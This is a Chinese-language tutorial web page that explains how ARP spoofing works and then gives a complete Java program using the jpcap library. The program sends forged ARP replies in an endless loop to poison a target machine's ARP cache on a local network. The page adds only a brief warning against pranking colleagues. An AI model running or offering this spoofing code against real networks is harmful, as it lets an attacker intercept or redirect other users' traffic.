歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
您现在的位置: Linux教程網 >> UnixLinux >  >> Linux編程 >> Linux編程

用Java代碼實現ARP攻擊

ARP攻擊原理
一台電腦通過網絡訪問另一台電腦的時候,在數據鏈路層需要知道對方的MAC地址進行真正的物理通信.
而電腦上的應用程序通常都是根據另一台電腦的IP地址來和對方建立通信,這時候就需要有一個協議將IP地址解析到MAC地址,這就是ARP協議.
而ARP具體過程就是當需要通過IP獲取一個遠端的的MAC地址的時候,系統會首先檢查ARP表中是否存在對應的IP地址,如果沒有,則發送一個ARP廣播,當某一個擁有這個MAC地址的節點收到ARP請求的時候,會創建一個ARP reply包,並發送到ARP請求的源節點,ARP Reply包中就包含了目的地節點的MAC地址,在源節點接受到這個reply後,會將目的地節點的MAC地址保存在ARP緩存表中,下一次再次請求同一 IP地址的時候,系統將會從ARP表中直接獲取目的地MAC地址,而不需要再次發送ARP廣播。
用ping命令舉例來說, 在機器A,比如說IP是192.168.1.2中發出下面的ping命令:
ping 192.168.1.3,如果192.168.1.3這個MAC地址在機器A的ARP緩存表中不存在,這時候機器A就會發送一個ARP廣播,當192.168.1.3接到廣播後,會給機器A回一個ARP Reply包,其中包含了192.168.1.3的MAC地址,這是正常的ARP過程.
假設IP--MAC的對應關系為(192.168.1.3--00-1C-23-2E-A7-0E)
但是局域網內的其他機器也可向機器A發一個假的IP--MAC對應關系ARP Reply包,機器A接收到這個假的包後同樣會更新自己的ARP緩存表.假設發送的為(192.168.1.3--00-1C-23-2E-A7-0A,0A實際上為192.168.1.4的MAC地址)
那麼機器A再通過IP往192.168.1.3發送數據的時候,實際上卻發到了192.168.1.4這台機器.
這樣就到達了ARP攻擊或者叫做ARP欺騙.ARP攻擊只能發生在局域網內.
本文旨在舉例說明ARP攻擊的原理,希望看官們不要用來惡作劇你局域網的其他機器,要不你的網管很快就會面談你滴...

下面用JAVA代碼模擬一下上面說到的ARP欺騙.
192.168.1.4將一個192.168.1.3的假的MAC地址發給 192.168.1.2.
需要用到jpcap.jar,可以從http://netresearch.ics.uci.edu/kfujii/Jpcap/doc/download.html下載.

  1. package com.test.arp;  
  2. import java.net.InetAddress;  
  3. import jpcap.JpcapCaptor;  
  4. import jpcap.JpcapSender;  
  5. import jpcap.NetworkInterface;  
  6. import jpcap.packet.ARPPacket;  
  7. import jpcap.packet.EthernetPacket;  
  8.   
  9. public class SendFakeARP {  
  10.     static byte[] stomac(String s) {  
  11.         byte[] mac = new byte[] { (byte0x00, (byte0x00, (byte0x00, (byte0x00, (byte0x00, (byte0x00 };  
  12.         String[] s1 = s.split("-");  
  13.         for (int x = 0; x < s1.length; x++) {  
  14.             mac[x] = (byte) ((Integer.parseInt(s1[x], 16)) & 0xff);  
  15.         }  
  16.         return mac;  
  17.     }  
  18.     public static void main(String[] args) throws Exception {  
  19.         int time = 2;  // 重發間隔時間   
  20.         InetAddress desip = InetAddress.getByName("192.168.1.2");// 被欺騙的目標IP地址   
  21.         byte[] desmac = stomac("00-1c-23-3c-41-7f");// 被欺騙的目標目標MAC數組   
  22.         InetAddress srcip = InetAddress.getByName("192.168.1.3");// 源IP地址   
  23.         byte[] srcmac = stomac("00-1C-23-2E-A7-0A"); // 假的MAC數組   
  24.         // 枚舉網卡並打開設備   
  25.         NetworkInterface[] devices = JpcapCaptor.getDeviceList();  
  26.         NetworkInterface device = devices[1];  
  27.         JpcapSender sender = JpcapSender.openDevice(device);  
  28.         // 設置ARP包   
  29.         ARPPacket arp = new ARPPacket();  
  30.         arp.hardtype = ARPPacket.HARDTYPE_ETHER;  
  31.         arp.prototype = ARPPacket.PROTOTYPE_IP;  
  32.         arp.operation = ARPPacket.ARP_REPLY;  
  33.         arp.hlen = 6;  
  34.         arp.plen = 4;  
  35.         arp.sender_hardaddr = srcmac;  
  36.         arp.sender_protoaddr = srcip.getAddress();  
  37.         arp.target_hardaddr = desmac;  
  38.         arp.target_protoaddr = desip.getAddress();  
  39.         // 設置DLC幀   
  40.         EthernetPacket ether = new EthernetPacket();  
  41.         ether.frametype = EthernetPacket.ETHERTYPE_ARP;  
  42.         ether.src_mac = srcmac;  
  43.         ether.dst_mac = desmac;  
  44.         arp.datalink = ether;  
  45.         // 發送ARP應答包   
  46.         while (true) {  
  47.             System.out.println("sending arp..");  
  48.             sender.sendPacket(arp);  
  49.             Thread.sleep(time * 1000);  
  50.         }  
  51.     }  
  52. }  
Copyright © Linux教程網 All Rights Reserved